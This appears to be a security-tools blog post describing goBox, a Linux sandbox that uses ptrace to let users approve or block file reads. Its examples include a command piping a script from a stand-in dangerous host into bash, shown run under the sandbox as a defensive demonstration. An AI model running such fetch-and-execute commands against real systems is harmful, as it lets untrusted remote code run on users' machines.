goBox : GO Sandbox To Run Untrusted Code

goBox uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed. GO sandbox to run untrusted code.

Usage

Usage of ./gobox:

gobox [FLAGS] command

Flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.

Also Read – https://kalilinuxtutorials.com/dnsprobe/

Use cases

You want to install anything

> gobox -n “/etc/password.txt” npm install sketchy-module
BLOCKED READ on /etc/password.txt
>gobox -n “/etc/password.txt” bash <(curl https://danger.zone/install.sh)
BLOCKED READ on /etc/password.txt

You are interested in what file reads you favorite program makes.

Sure you could use strace, but it references file descriptors the tool makes the this much easier at a glance by printing the absolute path of the fd.

>gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

NOTE: It’s definitely a better idea to encrypt all your sensitive data, it should probably only be used when that is inconvenient or impractical.

NOTE: I haven’t made any effort for cross-x compatibility so it currently only works on linux. I’d happily accept patches to improve portability.

R K

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

1 week ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

2 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago